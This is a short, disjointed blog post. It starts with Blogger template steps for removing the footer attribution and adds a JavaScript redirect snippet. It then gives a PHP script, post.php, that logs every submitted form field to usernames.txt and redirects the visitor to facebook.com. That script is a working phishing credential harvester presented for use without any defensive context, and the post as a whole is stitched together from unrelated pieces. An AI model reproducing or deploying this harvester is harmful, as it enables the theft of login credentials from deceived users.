Dashboard, click on Template Tab and open the HTML editor of your blog.
Step-2:
jump to Attribution1 Gadget from the template drop-down menu option called Jump to widget appeared on top of the HTML template editor.
Search these two lines of html codes and change/ replace showaddelement=’no‘> with showaddelement=’yes‘> shown in the first line and locked=’true‘ with locked=’false‘ shown in the second line.
Save template
ow, you can easily add your own text linked copyright messages and other information by adding new Text or HTML/JavaScript Gadget in your blog footer.
Note that this method only delete the blogger attribution from web version of Blogger template and therefore the mobile visitors will still see the Powered by Blogger at the footer of your blogger blog.
Bloggerr redirect
<script type='text/javascript'>
var d='<data:blog.url/>';
d=d.replace(/.*\/\/[^\/]*/, '');
location.href = 'http://blogtimenow.com';
</script>
post.php
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Tidak ada komentar:
Posting Komentar